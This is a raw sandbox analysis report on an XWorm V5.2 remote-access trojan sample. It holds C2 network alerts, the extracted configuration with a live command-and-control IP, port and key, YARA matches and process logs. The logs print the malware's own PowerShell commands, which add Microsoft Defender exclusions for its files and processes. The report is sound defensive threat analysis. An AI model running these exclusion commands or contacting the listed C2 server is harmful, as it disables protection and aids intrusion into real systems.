2024-12-02T22:09:02.344563+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
2024-12-02T22:09:08.039041+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP
Suricata alerts, SID 2852874 (server to client)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T22:05:43.176015+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:13.138814+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:06:43.128361+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:13.148654+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:07:43.140971+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:13.145222+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
2024-12-02T22:08:43.139674+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.250.180.178 | 7061 | 192.168.2.6 | 49770 | TCP
Suricata alerts, SID 2853193 (client to server)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T22:07:28.169006+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.250.180.178 | 7061 | TCP

              AV Detection

Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe | Avira: detection malicious, Label: HEUR/AGEN.1309499
Source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["104.250.180.178"], "Port": 7061, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\XClient.exe | ReversingLabs: Detection: 44%
Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\XClient.exe | Joe Sandbox ML: detected
Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe | Joe Sandbox ML: detected
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: 104.250.180.178
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: 7061
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: <123456789>
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: <Xwormmm>
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: XWorm V5.2
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: USB.exe
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: %AppData%
Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack | String decryptor: XClient.exe
Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cxFT.pdb | source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr
Source: Binary string: cxFT.pdbSHA256 | source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr

              Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.250.180.178:7061 -> 192.168.2.6:49770
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.250.180.178:7061 -> 192.168.2.6:49770
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49770 -> 104.250.180.178:7061
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49770 -> 104.250.180.178:7061
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49770 -> 104.250.180.178:7061
Source: Malware configuration extractor | URLs: 104.250.180.178
Source: Yara match | File source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49770 -> 104.250.180.178:7061
Source: Joe Sandbox View | IP Address: 104.250.180.178
Source: Joe Sandbox View | ASN Name: M247GB
Source: unknown | TCP traffic detected without corresponding DNS query: 104.250.180.178
              Source: powershell.exe, 0000000A.00000002.2322743130.000000000725D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.miSt
              Source: powershell.exe, 00000007.00000002.2268207610.0000000006C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000004.00000002.2232645049.0000000008764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microR
              Source: powershell.exe, 00000007.00000002.2251654421.0000000002944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
              Source: powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.0000000004406000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.2215062387.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2252132549.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2296539543.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.0000000004D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000004EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2354647284.0000000005496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354647284.00000000056C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.2221643363.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2262886255.0000000005319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2315451804.00000000058A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2375247049.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              System Summary

              barindex
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 0_2_02E7D3A40_2_02E7D3A4
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_0310622D3_2_0310622D
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_031044D03_2_031044D0
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_03104AC83_2_03104AC8
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_031014583_2_03101458
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058BC4583_2_058BC458
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B31383_2_058B3138
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B80E03_2_058B80E0
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B28683_2_058B2868
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B73903_2_058B7390
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B7AF33_2_058B7AF3
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B25203_2_058B2520
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_058B48523_2_058B4852
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_066994973_2_06699497
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_0669E2783_2_0669E278
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_066959CC3_2_066959CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BDB4984_2_04BDB498
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BDB4884_2_04BDB488
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08BD3AA84_2_08BD3AA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BB4A07_2_041BB4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BB49B7_2_041BB49B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08193A987_2_08193A98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0471B49010_2_0471B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0471B47010_2_0471B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04B0B49014_2_04B0B490
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157704165.0000000004079000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2158645317.00000000058C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2156582021.00000000013FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157704165.00000000040B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157295618.00000000030FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000000.2099272055.0000000000C12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2159150876.0000000007410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4559034426.00000000013C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4584959229.0000000004301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4588365166.0000000006539000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeBinary or memory string: OriginalFilenamecxFT.exe6 vs THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: XClient.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, evBSdWeBEycC8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, evBSdWeBEycC8.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, gtv0gssvKWWRAOg38T65o.csBase64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, gtv0gssvKWWRAOg38T65o.csBase64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XYhn0PmGM2d0vqBguD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winEXE@15/21@0/1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\THITWNSEI24112908089786756456545346568789-00010.scr.exe.log
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1176:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2444:120:WilError_03
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMutant created: \Sessions\1\BaseNamedObjects\XczLagvCjDnYaiUQ
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmp
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile read: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
              Source: unknownProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"
